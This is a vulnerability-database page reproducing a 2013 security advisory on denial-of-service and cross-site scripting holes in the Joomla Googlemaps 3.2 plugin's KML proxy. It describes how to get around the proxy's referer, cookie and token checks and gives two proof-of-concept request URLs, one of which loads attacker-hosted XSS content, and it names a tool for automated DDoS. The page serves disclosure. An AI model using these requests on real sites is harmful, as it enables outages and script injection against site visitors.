Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Googlemaps 3.2 Cross Site Scripting / Denial Of Service

🗓️ 26 Jul 2013 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Joomla Googlemaps 3.2 Cross Site Scripting / Denial Of Service vulnerabilitie

Code
`Hello list!  
  
Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for  
Joomla (http://securityvulns.ru/docs29645.html). After my informing, the  
developer fixed these vulnerabilities in versions 2.19 and 3.1 of the  
plugin - by removing proxy functionality. And in version 3.2 of the plugin  
he introduced new proxy functionality, which must be protected against  
previous attacks. But after my checking, I've found two holes in the last  
version of the plugin.  
  
These are Denial of Service and Cross-Site Scripting vulnerabilities in  
Googlemaps plugin for Joomla.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer  
about these holes. Now he is working on a new version.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Mike Reumer  
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147  
  
----------  
Details:  
----------  
  
To bypass protection for accessing this script it's needed to set referer,  
cookie and token. The referer is current site, the cookie is set by the site  
(Joomla) itself and the token can be found at page which uses plugin of the  
site (and it's setting in URL). This data can be taken from the site  
automatically.  
  
Referer: http://site  
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0  
  
Denial of Service (WASC-10):  
  
http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1  
  
Besides conducting DoS attack manually, it's also possible to conduct  
automated DoS and DDoS attacks with using of DAVOSET  
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).  
  
Cross-Site Scripting (WASC-08):  
  
http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2013 00:00Current
0.3Low risk
Vulners AI Score0.3
joomla googlemaps plugincross-site scriptingdenial of servicevulnerabilitiesmike reumerwasc-10wasc-08davosetwebsecurity
23